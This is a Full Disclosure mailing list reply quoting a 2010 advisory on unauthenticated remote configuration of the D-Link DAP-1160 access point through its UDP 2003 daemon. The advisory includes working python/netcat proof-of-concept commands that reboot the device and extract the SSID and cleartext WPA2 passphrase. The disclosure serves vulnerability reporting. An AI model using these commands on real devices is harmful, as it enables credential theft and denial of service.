Full Disclosure mailing list archives
Re: IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration
From: Gary Baribault <gary () baribault net>
Date: Mon, 28 Jun 2010 10:29:34 -0400
Is that UDP 2003 open on the WAN interface as well? Gary Baribault On 06/28/2010 09:50 AM, Cristofaro Mune wrote:
Security Advisory IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration Advisory Information -------------------- Published: 2010-06-28 Updated: 2010-06-28 Manufacturer: D-Link Model: DAP-1160 Firmware version: 1.20b06 1.30b10 1.31b01 Vulnerability Details --------------------- Public References: Not Assigned Platform: Successfully tested on D-Link DAP-1160 loaded with firmware versions: v120b06, v130b10, v131b01. Other models and/or firmware versions may be also affected. Note: Only firmware version major numbers are displayed on the administration web interface: 1.20, 1.30, 1.31 Background Information: D-Link DAP-1160 is a wireless access points that allow wireless clients connectivity to wired networks. Supported 802.11b and 802.11g protocols. WEP, WPA and WPA2 supported. Summary: Unauthenticated access and modification of several device parameters, including Wi-Fi SSID, keys and passphrases is possible. Unauthenticated remote reboot of the device can be also performed. Details: DCCD is an UDP daemon that listens on port UDP 2003 of the device, that is likely used for easy device configuration via the DCC (D-Link Click 'n Connect) protocol. By sending properly formatted UDP datagrams to dccd daemon it is possible to perform security relevant operation without any previous authentication. It is possible to remotely retrieve sensitive wireless configuration parameters, such as Wi-Fi SSID, Encryption types, keys and passphrases, along with other additional information. It is also possible to remotely modify such parameters and configure the device without any knowledge of the web administration password. Remote reboot is another operation that an attacker may perform in an unauthenticated way, possibly triggering a Denial-of-Service condition. POC: - Remote reboot python -c 'print "\x05" + "\x00" * 7' | nc -u <IP_ADDR> 2003 - Retrieving Wi-Fi SSID python -c 'print "\x03" + "\x00" * 7 + "\x21\x27\x00"' | nc -o ssid.txt -u <IP_ADDR> 2003 cat ssid.txt (cleartext SSID displayed after "21 27 xx xx" in the received datagram) - Retrieving WPA2 PSK python -c 'print "\x03" + "\x00" * 7 + "\x23\x27\x00\x00\x24\x27\x00"' | nc -u -o pass.txt <IP_ADDR> 2003 cat pass.txt (cleartext WPA2 PSK displayed after "24 27 xx xx" in the received datagram) Impacts: Remote extraction of sensitive information Modification of existing device configuration POssible Denial-of-Service Solutions & Workaround: Not available Additional Information ---------------------- Timeline (dd/mm/yy): 17/02/2010: Vulnerability discovered 17/02/2010: No suitable technical/security contact on Global/Regional website. No contact available on OSVDB website 18/02/2010: Point of contact requested to customer service ----------- No response ----------- 26/05/2010: Partial disclosure at CONFidence 2010 28/06/2010: This advisory Additional information available at http://www.icysilence.org _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration Cristofaro Mune (Jun 28)
- Re: IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration Gary Baribault (Jun 28)
- Re: IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration Cristofaro Mune (Jun 28)
- Re: IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration Gary Baribault (Jun 28)